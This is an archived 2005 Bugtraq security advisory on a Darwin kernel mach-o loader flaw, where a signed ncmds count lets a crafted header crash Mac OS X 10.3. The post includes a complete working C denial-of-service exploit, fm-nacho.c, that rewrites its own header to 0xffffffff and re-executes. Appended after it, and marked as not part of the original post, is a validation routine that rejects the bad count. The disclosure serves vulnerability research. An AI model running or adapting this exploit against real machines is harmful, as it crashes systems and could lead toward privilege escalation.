Message-ID: <20050119195315.GB2895@felinemenace.org>
Date: Wed, 19 Jan 2005 11:53:15 -0800
From: nemo@...inemenace.org
To: bugtraq@...urityfocus.com
Subject: Darwin Kernel Vulnerability


moderator: resending this mail since it appears to have got dropped, if not, please ignore this message.

                     _,'|             _.-''``-...___..--';)
                     /_ \'.      __..-' ,      ,--...--'''
                    <\    .`--'''       `     /'
                    `-';'               ;   ; ;
               __...--''     ___...--_..'  .;.'
           fL (,__....----'''       (,..--''  felinemenace.org

Program:	Darwin Kernel 7.1
Impact:		DoS, Possible local privilege escalation.	
Discovered:	8th January 2005 by nemo -( nemo @ felinemenace.org )-
Writeup and exploits:

1) Background

Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3.
Some of the bugs we investigated exist due to lack of input validation in the mach-o 
loader.

2) Description

In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part
each field is trusted to be acceptable.

In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as 
signed integers, however the appropriate structs used to read from the file are 
unsigned.
After a little investigation a DoS was quickly written to set ncmds to -1. 

	ncmds = header->ncmds;
	while (ncmds--) {

The attached code will cause a denial of service on MacOSX <= 10.3.7

3) Notes
During our audit of the Darwin Kernel many bugs stood out, however we have not 
had time to follow through on most of them. Something that caught our attention 
was the misuse of the copyinstr() command. This function will not force a NULL
character to be appended to the string copied in, however it seems in many cases
the size passed to the function doesn't take this into account.
Unfortunately, as security goes, it's all about who posts first.
http://www.immunitysec.com/downloads/nukido.pdf

4) Vendor status/notes/fixes/statements
Apple have been notified about this bug.

5) Exploit

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo@...ltheplug.org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 */

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>     /* sleep(), execv() */

int main(int ac, char **av)
{
        FILE *me;
        int rpl = 0xffffffff;
        fpos_t pos = 0x10;
        printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
        printf("-( nemo@...ltheplug.org )-\n\n");
        printf("[+] Opening file for writing.\n");
        if(!(me = fopen(*av,"r+"))) {
                printf("[-] Error opening exe.\n");
                exit(1);
        }
        printf("[+] Seeking to ncmds.\n");
        if((fsetpos(me,&pos)) == -1) {
                printf("[-] Error seeking to ncmds.\n");
                exit(1);
        }
        printf("[+] Changing ncmds to 0x%x.\n",rpl);
        if(fwrite(&rpl,4,1,me) < 1) {
                printf("[-] Error writing to file.\n");
                exit(1);
        }
        fclose(me);
        printf("[+] Re-executing with modified mach-o header.\n");
        sleep(5);
        if(execv(*av,av) == -1 ) {
                printf("[-] Error executing %s, please run manually.\n",*av);
                exit(1);
        }
        exit(0); // hrm
}
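
The validation that section 2 says parse_machfile() lacks, as an added example (not part of the original post and not Apple's fix): the count stays unsigned and is checked against sizeofcmds and the image length before any loop uses it. The names check_mach_header, sample_status and the mh_status values are hypothetical, and the sample header is constructed.

```c
#include <stddef.h>
#include <stdint.h>

#define MH_HDR_SIZE 28u  /* struct mach_header: seven 32-bit fields */
#define LC_MIN_SIZE 8u   /* struct load_command: cmd + cmdsize */

enum mh_status { MH_OK, MH_TRUNCATED, MH_BAD_MAGIC, MH_BAD_SIZEOFCMDS, MH_BAD_NCMDS };

/* Read an unsigned 32-bit field at byte offset off in the given byte order. */
static uint32_t rd32(const uint8_t *p, size_t off, int big)
{
    const uint8_t *b = p + off;
    return big ? ((uint32_t)b[0] << 24 | (uint32_t)b[1] << 16 | (uint32_t)b[2] << 8 | b[3])
               : ((uint32_t)b[3] << 24 | (uint32_t)b[2] << 16 | (uint32_t)b[1] << 8 | b[0]);
}

/* Hypothetical check: accept ncmds only if that many minimum-size load
 * commands fit in sizeofcmds, and sizeofcmds fits in the image. */
enum mh_status check_mach_header(const uint8_t *img, size_t len, uint32_t *ncmds_out)
{
    int big;
    if (len < MH_HDR_SIZE) return MH_TRUNCATED;
    if (rd32(img, 0, 1) == 0xfeedfaceu) big = 1;        /* big-endian image */
    else if (rd32(img, 0, 0) == 0xfeedfaceu) big = 0;   /* little-endian image */
    else return MH_BAD_MAGIC;

    uint32_t ncmds = rd32(img, 0x10, big);       /* the field the PoC overwrites */
    uint32_t sizeofcmds = rd32(img, 0x14, big);
    if (sizeofcmds > len - MH_HDR_SIZE) return MH_BAD_SIZEOFCMDS;
    if (ncmds > sizeofcmds / LC_MIN_SIZE) return MH_BAD_NCMDS;  /* rejects 0xffffffff */
    *ncmds_out = ncmds;                          /* stays unsigned for the caller's loop */
    return MH_OK;
}

/* Constructed sample: big-endian header plus one 8-byte load command (36 bytes). */
enum mh_status sample_status(uint32_t ncmds)
{
    uint8_t img[36] = { 0xfe, 0xed, 0xfa, 0xce };
    uint32_t out = 0;
    img[0x10] = (uint8_t)(ncmds >> 24); img[0x11] = (uint8_t)(ncmds >> 16);
    img[0x12] = (uint8_t)(ncmds >> 8);  img[0x13] = (uint8_t)ncmds;
    img[0x17] = 8;   /* sizeofcmds = 8 */
    img[0x23] = 8;   /* cmdsize of the single load command */
    return check_mach_header(img, sizeof img, &out);
}
```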



